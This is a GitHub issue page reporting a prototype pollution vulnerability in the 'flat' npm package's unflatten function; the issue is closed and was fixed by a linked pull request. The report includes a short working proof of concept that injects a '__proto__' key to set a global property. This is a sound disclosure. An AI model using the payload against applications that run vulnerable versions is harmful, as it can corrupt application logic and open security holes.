Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Prototype Pollution #105

Closed
po6ix opened this issue Jul 18, 2020 · 1 comment · Fixed by #106
Closed

Prototype Pollution #105

po6ix opened this issue Jul 18, 2020 · 1 comment · Fixed by #106

Comments

@po6ix
Copy link

po6ix commented Jul 18, 2020

This module has prototype pollution vulnerablity
and it can make logic vulnerability in application use this

var unflatten = require('flat').unflatten;

unflatten({
    '__proto__.polluted': true
});

console.log(polluted); // true
@989919259920
Copy link

خوب و عالی و بهتر است

# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants